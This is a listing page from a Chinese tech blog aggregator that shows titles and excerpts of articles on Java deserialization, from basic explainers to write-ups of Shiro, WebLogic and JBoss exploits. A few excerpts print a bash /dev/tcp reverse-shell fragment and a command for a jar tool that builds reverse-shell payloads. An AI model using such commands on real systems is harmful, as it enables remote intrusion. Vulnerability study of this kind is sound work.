JAVA反序列化

shiro RememeberMe 1.2.4反序列化漏洞

apacheshiro在java的权限及安全验证框架中占有重要的一席之地,在它编号为550的issue中爆出过严重的java反序列化漏洞
7hang_·2021-06-09 14:32

Jackson、Gson、Fastjson 序列化与反序列化使用简介

Java反序列化是指把传输的字节序列恢复为Java对象的过程。这两个过程使我们非常方便的存储和传输数据。
我问你瓜保熟吗·2021-05-18 10:13

C#实体类属性大写转JSON变成小写

C#服务实体类序列化后属性名称开头如果有大写使用JAVA反序列化工具时无法对应实体类小写字母,需要把序列化里面属性开头字母转换为小写字母;使用Newtonsoft中的[JosonProperty]标签publicclassStockStorageInfo
坑你坑你com·2021-04-29 08:18

Web 安全 之 Insecure deserialization

我们将重点介绍典型的场景,并演示一些PHP、Ruby和Java反序列化的具体示例。最后也会介绍一些避免不安全的反序列化漏洞的方法。利用不安全的反序列化通常比较困难。然而,它有时比你想象的要简单得多。
·2021-03-09 22:46

Web 安全 之 Insecure deserialization

我们将重点介绍典型的场景,并演示一些PHP、Ruby和Java反序列化的具体示例。最后也会介绍一些避免不安全的反序列化漏洞的方法。利用不安全的反序列化通常比较困难。然而,它有时比你想象的要简单得多。
·2021-03-09 22:46

什么是序列化和反序列化?

1、序列化和反序列化的定义:(1)Java序列化就是指把Java对象转换为字节序列的过程Java反序列化就是指把字节序列恢复为Java对象的过程。
西西爸de札记·2021-02-03 10:57

2020羊城杯CTF随缘Writeup

2020羊城杯CTF随缘Writeupdocker源码链接:https://github.com/k3vin-3/YCBCTF2020Web部分a_piece_of_java考点:源码审计、java反序列化
k3vin-3·2021-01-09 16:58

Java序列化浅析

定义Java序列化是指将Java对象保存为二进制字节码的过程;Java反序列化表示将二级制字节码转化为Java对象的过程。
红 ♬ 枫叶·2020-11-14 22:13

深入浅出谈Java安全之URLDNS链

那么这里先来了解一下Java反序列化和反序列化漏洞的一个产生。
Java正道的光·2020-10-08 16:09

Java安全之URLDNS链

那么这里先来了解一下Java反序列化和反序列化漏洞的一个产生。
·2020-10-06 00:00

一文带你彻底理解Java序列化和反序列化

Java序列化是指把Java对象转换为字节序列的过程,Java反序列化是指把字节序列恢复为Java对象的过程。反序列化:客户端重文件,或者网络中获取到文件以后,在内存中重构对象。
·2020-09-28 12:17

Python使用pickle进行序列化和反序列化的示例代码

Java反序列化可参见“Java反序列化漏洞实现”。二、代码
·2020-09-22 12:51

反序列化时构造函数不会执行

java反序列化:反序列化时构造函数不会执行转载于:https://www.cnblogs.com/lanfengniao/archive/2013/05/12/3074501.html
weixin_34055787·2020-09-17 09:43

java中的序列化和反序列化

什么是反序列化我先解释下;Java序列化是指把Java对象转换为字节序列的过程;而Java反序列化是指把字节序列恢复为Java对象的过程。
guijih·2020-09-17 09:42

基于php的反序列化漏洞简析

反序列化漏洞总体来说是一个比较新的漏洞,第一次被人们知晓是在2015年11月6日,FoxGloveSecurity安全团队的breenmachine发表了一篇篇博客,里面详细阐述了利用java反序列化
Alexz__·2020-09-16 22:25

JAVA序列化详解

什么是JAVA序列化Java序列化是指把Java对象转换为字节序列的过程;Java反序列化是指把字节序列恢复为Java对象的过程。
DBTomato·2020-09-15 23:56

IO流(进阶提高)

IO的基本接口知识:————————————————————我是不起眼的分割线————————————————————————IO的序列化与反序列化Java序列化是指把Java对象转换为字节序列的过程;Java
huwao·2020-09-15 10:04

weblogic使用jdk7u21 gadget以及回显

参考:https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/Jdk7u21.javaJava
caiqiiqi·2020-09-15 10:13

Java反序列化/反射/动态生成字节码

参考:https://mp.weixin.qq.com/s/HskIJZtl4fPRyc2G36JFow反序列化漏洞中利用到很多反射的知识,普通的new一个对象://先拿到Class对象ClassaClass=Class.forName("org.chabug.entity.ReflectionClass");//new这个Class对应的对象Objecto=aClass.newInstance(
caiqiiqi·2020-09-15 10:42

JBoss 5.x和6.x 反序列化漏洞(CVE-2017-12149)

0x01漏洞简介该漏洞为Java反序列化错误类型,存在于Jboss的HttpInvoker组件中的ReadOnlyAccessFilter过滤器中。
`GGyao·2020-09-13 01:59

解决tomcat中反序列化找不到class

实际上java反序列化的时候,我们一般用的是ObjectInputStream,他默认会去找sun.misc.VM.latestUserDefinedLoader(),这个就是系统默认的ap
huangyunbin90·2020-09-13 01:53

java/php 通用serialize/unserialize,序列与反序列化的问题

java的serialize,序列化之后,会把java.util…包名都放进去了,而且格式也不同于php对于汉字php占用2个字符,java占用一个字符,隐藏php序列化后,再由java反序列化,可能导致乱码
thunder-1·2020-09-12 11:49

Jackson框架出现Java反序列化漏洞 2.7.10 及2.8.9以下版本受影响 绿盟科技发布防护方案...

而更早的时候,Java反序列化漏洞问题曾经一度让大家心惊肉跳,这次是Jackson框架2.7.10及2.8.9以下版本出现任意代码执行漏洞,攻击者利用该漏洞可以获得网站控制权。
weixin_33726318·2020-09-12 07:27

Java反序列化漏洞原理解析

业务类实现java.io.Serializable接口才可被反序列化,而且必须所有属性是可序列化的,除了transient修饰的属性除外。Java反射Java中定义的一个类本身也是一个类对象,它们是java.lang.Class类的实例。类对象的特征包括表示正在运行的Java应用程序中的类和接口没有公共构造方法,由Java虚拟机自动构造提供类本身的信息,比如有几种构造方法,有多少属性,有哪些普通方
ZHANGJNWEI·2020-09-12 05:49

JAVA 反序列化攻击

Java反序列化攻击漏洞由FoxGlove的最近的一篇博文爆出,该漏洞可以被黑客利用向服务器上传恶意脚本,或者远程执行命令。
weixin_33962621·2020-09-11 20:20

详解 Java 中的序列化与反序列化

Java序列化是指把Java对象转换为字节序列的过程,而Java反序列化是指把字节序列恢复为Java对象的过程:序列化:对象序列化的最主要的用处就是在传递和保存对象的时候,保证对象的完整性和可传递性。
巅峰大词典·2020-08-26 23:16

序列化和反序列化

序列化和反序列化序列化和反序列化的定义Java序列化:就是指把Java对象转换为字节序列的过程Java反序列化:就是指把字节序列恢复为Java对象的过程。
罗罗的1024·2020-08-24 07:41

Web 服务器安全之 Weblogic 漏洞重现与攻防实战

本场chat介绍Weblogic常见的漏洞,其中包括:弱口令、Java反序列化、XMLdecoder反序列化、SSRF漏洞、任意文件上传,并根据其漏洞,使用Docker+Vulhub进行复现。
技术杂谈哈哈哈·2020-08-24 05:22

利用Java反序列化漏洞在Windows上的挖矿实验

最近,安全社区中有很多人都在讨论如何利用Java反序列化漏洞来攻击类似Apache、SOLR和WebLogic之类的系统。不说废话,我们直接进入正题。
qq_27446553·2020-08-23 22:51

Java 重新理解Serializable

Java反序列化:序列化的逆过程,将序列化到
业余的猫·2020-08-23 14:38

Shiro rememberMe 在线解密 shiroDecrypt

Java反序列化漏洞ApacheShiroRememberMe1.2.4远程代码执行工具地址ShirorememberMe在线解密https://sec.dog/shiroDecrypt.html说明有些攻击告警需要排查
v1·2020-08-22 16:17

Java反序列化漏洞之Weblogic、Jboss利用之payload生成工具

为了方便小伙伴们使用,我导出了两个jar包,分别用于制作反弹shell的payload和测试的payload。使用方法和利用方法请仔细看下面的截图:1、制作反弹shell的payload并利用:命令:java-jarmakeshell.jar你的IP监听端口payload名如:java-jarmakeshell.jar202.112.221.328888D:\\java\\shellpayload
aaa0404524·2020-08-22 16:38

远程命令执行与反序列化——Weblogic中间件反序列化漏洞及相关

Weblogic中间件反序列化漏洞及相关常见漏洞有那些:弱口令、Java反序列化漏洞操作(CVE-2018-2628)、任意文件上传漏洞操作(CVE-2018-2894)、XMLDecoder反序列化漏洞操作
温柔小薛·2020-08-22 15:34

Apache Shiro java反序列化漏洞复现

ApacheShirojava反序列化漏洞复现影响版本ApacheShiro&/dev/tcp/192.168.136.1/88880>&1使用http://www.jackson-t.ca/runtime-exec-payloads.html
源_YUAN·2020-08-22 00:42

java反序列化——XMLDecoder反序列化漏洞

前言最近学习java反序列化学到了weblogic部分,weblogic之前的两个反序列化漏洞不涉及T3协议之类的,只是涉及到了XMLDecoder反序列化导致漏洞,但是网上大部分的文章都只讲到了触发XMLDecoder
合天智汇·2020-08-21 20:02

Shiro rememberMe 在线解密 shiroDecrypt

Java反序列化漏洞ApacheShiroRememberMe1.2.4远程代码执行工具地址ShirorememberMe在线解密https://sec.dog/shiroDecrypt.html说明有些攻击告警需要排查
v1·2020-08-21 04:42

java反序列化漏洞学习之Apache Commons Collections

archives/121/https://www.xmanblog.net/java-deserialize-apache-commons-collections/https://www.smi1e.top/java
东方·2020-08-21 01:40

Commons Collections Java反序列化漏洞利用

0x00漏洞原理与成因漏洞作者写的技术分析:http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/腾讯TSRC:https://security.tencent.com
autohacker·2020-08-20 23:20

JAVA反序列化之Apache Commons Collections反序列化漏洞分析

ApacheCommonsCollections反序列化漏洞必然是2015年影响重大的漏洞之一,同时也开启了各类java反序列漏洞的大门,这几年大量各类java反序列化漏洞不断出现。
chenwan8737·2020-08-20 21:27

Java代码审计:Java反序列化入门之URLDNS链

0x01Java反序列化介绍Java反序列化漏洞的产生原因:简
god_zZz·2020-08-20 00:15

java反序列化漏洞

简单分析构造一个对象——反序列化——提交数据Map类是存储键值对的数据结构TransformedMap类,该类可以在一个元素被添加/删除/或是被修改时,会调用transform方法自动进行特定的修饰变换,具体的变换逻辑由Transformer类定义简单来说就是数据改变时,进行一些我们提前设定好的操作transformedMap类MaptransformedMap=TransformedMap.de
NoOne_52·2020-08-17 07:37

shiro-550漏洞复现(CVE-2016-4437)

攻击者可以使用Shiro的默认密钥伪造用户Cookie,触发Java反序列化漏洞,进而在目标机器上执行任意命令。
ATpiu·2020-08-16 15:12

java中Serializable与Parcelable的使用

但不包括方法和static变量(因为static修饰的变量是属于类而不隶属于对象),以及用transient关键字修饰的变量(transient是禁止序列化的标识,效果等同于static修饰的变量).java
stormCoderStorm·2020-08-16 15:45

JAVA Apache-CommonsCollections 序列化RCE漏洞分析

0x00漏洞背景2015年11月6日,FoxGloveSecurity安全团队的@breenmachine发布的一篇博客中介绍了如何利用Java反序列化漏洞,来攻击最新版的WebLogic、WebSphere
he1m4n6a·2020-08-16 15:56

Java反序列化漏洞:在受限环境中从漏洞发现到获取反向Shell

前言Java反序列化漏洞可以说是Java安全的一块心病,近年来更是在安全界“出尽风头”。
废弃的root·2020-08-16 14:34

Apache Shiro 1.2.4反序列化漏洞(CVE-2016-4437)

攻击者可以使用Shiro的默认密钥伪造用户Cookie,触发Java反序列化漏洞,进而在目标机器上执行任意命令。1.搭建好环境2.复现http://目
忘止于心·2020-08-16 14:30

Apache Shiro 反序列化(CVE-2016-4437)复现

0x01简介这个漏洞属于java反序列化漏洞的一种,shiro是java的一个开发框架执行身份验证、授权、密码和会话管理。
东塔安全学院·2020-08-16 13:58

WDScanner:一款分布式Web漏洞扫描平台

WDScanner简介随着互联网各种安全漏洞愈演愈烈,JAVA反序列化漏洞、STRUTS命令执行漏洞、ImageMagick命令执行漏洞等高危漏洞频繁爆发。
systemino·2020-08-16 11:27

Java序列化常见的三个问题

Java序列化是指把Java对象转换为字节序列的过程,而Java反序列化是指把字节序列恢复为Java对象的过程:序列化:对象序列化的最主要的用处就是在传递和保存对象的时候,保证对象的完整性和可传递性。
·2020-08-14 12:24

Weblogic10.3.6反序列化漏洞补丁(3L3H)升级方案

针对这几年来WebLogic软件经常报出的java反序列化漏洞问题,因为weblogic底层也使用ApacheCommonsCollections库,WebLogic存在Java反序列化漏洞无疑的,在漏洞修复这方面
孑木文学·2020-08-14 12:57
上一页 1 2 3 4 5 6 7 8 下一页
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他